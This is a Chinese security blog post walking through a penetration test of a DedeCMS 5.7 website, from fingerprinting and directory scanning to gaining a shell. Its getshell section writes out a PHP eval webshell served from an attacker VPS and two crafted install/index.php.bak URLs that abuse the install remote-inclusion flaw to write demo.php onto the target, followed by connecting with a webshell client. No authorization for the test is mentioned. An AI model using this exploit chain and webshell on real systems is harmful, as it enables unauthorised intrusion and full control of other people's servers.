渗透测试从信息收集到getshell

举报
Khan安全团队 发表于 2023/05/15 20:40:04 2023/05/15
【摘要】 渗透测试从信息收集到getshell

00x01 信息收集

 

        拿到目标url云悉指纹搞一波,指纹没匹对出来,回到网站

 


        虽然没匹对出指纹,但随便浏览个网页看到url总感觉是什么

 

图片

 

那就谷歌一下


图片


灵感不就来了,那么初步判断有可能是dedecms尝试了几个dedecms的目录,均是not found

 

图片


既然是开源的,那我就去找下源码,看看


图片


看到有个robots.txt,看一眼

 

图片


还真有,那就匹对一下,八九不离十,在看看member还是没有,访问都没有结果,上个御剑扫一下目录看看,

 


看到个photo我觉得大有文章,访问一下


图片


我的天啊,出来了,还真是dedecms,访问url确定一下:

 


没错了,确定为织梦CMS搭建的网站,那怎么确定用的织梦什么版本呢,我们可以这样判断


photo/data/admin/ver.txt

图片


Google搜索一下,锁定一下版本应该为5.7左右

图片

确定了版本之后,其实我们从前面的信息(容器版本:apache2.2,存在install文件)可以大致的锁定一个漏洞----织梦远程包含漏洞

 

 


00x02 Getshell


        利用条件:首先,是目标站安装完cms后并没有删除install文件夹,其次网站建站容器版本过低,当Apache检测到一个文件有多个扩展名时,如1.php.bak,会从右向左判断,直到有一个apache认识的扩展名。

 

 

图片

 

我觉得基本稳了,开干。

在外网VPS创建一个文件dedecms/demodata.a.txt具体操作如下:1 mkdir dedecms2 echo "<?php @eval($_POST[cmd]);?>">dedecms/demodata.a.txt3 python3 -m http.server

 

图片

 

 

访问如下url:

http://xxx.com/photo/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php

 

图片


http://xxx.com/photo/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=demo.php&updateHost=http://VPS/

 

图片

 

如果成功的话,即可生成/install/demo.php,我觉得没问题了,上菜刀

 

图片


【版权声明】本文为华为云社区用户原创内容,未经允许不得转载,如需转载请自行联系原作者进行授权。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。